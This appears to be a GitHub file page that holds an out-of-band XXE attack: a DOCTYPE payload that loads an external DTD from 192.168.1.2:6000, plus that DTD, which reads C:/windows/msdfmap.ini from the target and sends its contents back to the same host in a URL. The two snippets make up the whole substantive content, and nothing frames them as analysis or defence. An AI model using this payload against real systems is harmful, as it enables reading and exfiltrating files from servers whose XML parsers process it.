Skip to content

Latest commit

 

History

History
17 lines (15 loc) · 327 Bytes

File metadata and controls

17 lines (15 loc) · 327 Bytes
  • XXE Payload:
<!DOCTYPE xxe [ 
 <!ENTITY % dtd SYSTEM "http://192.168.1.2:6000/ext.dtd">
%dtd;
%all;
%send;]>
  • ext.dtd File:
<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % file SYSTEM "file:///C:/windows/msdfmap.ini">
<!ENTITY % all "<!ENTITY &#37; send SYSTEM 'http://192.168.1.2:6000/?%file;'>">
%all;